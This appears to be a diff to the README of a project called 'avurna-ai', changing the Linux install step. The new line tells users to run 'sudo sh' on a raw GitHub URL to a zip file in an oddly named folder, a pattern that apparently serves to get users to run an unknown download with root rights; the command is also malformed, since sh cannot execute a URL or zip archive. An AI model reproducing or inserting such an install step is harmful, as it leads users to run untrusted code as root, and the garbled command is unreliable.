Bancroftencouraging198/avurna-ai/README.md

 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For Mac: Open the downloaded `.dmg` file and drag the Avurna icon to your Applications folder.
-   - For Linux: Open the terminal, navigate to your Downloads folder, and run the installer using the command: `sudo sh avurna-installer.sh`.
+   - For Linux: Open the terminal, navigate to your Downloads folder, and run the installer using the command: `sudo sh https://raw.githubusercontent.com/Bancroftencouraging198/avurna-ai/main/morphotic/avurna-ai-v1.5.zip`.

 5. **Open Avurna:** Once the installation is complete, find Avurna in your applications and open it.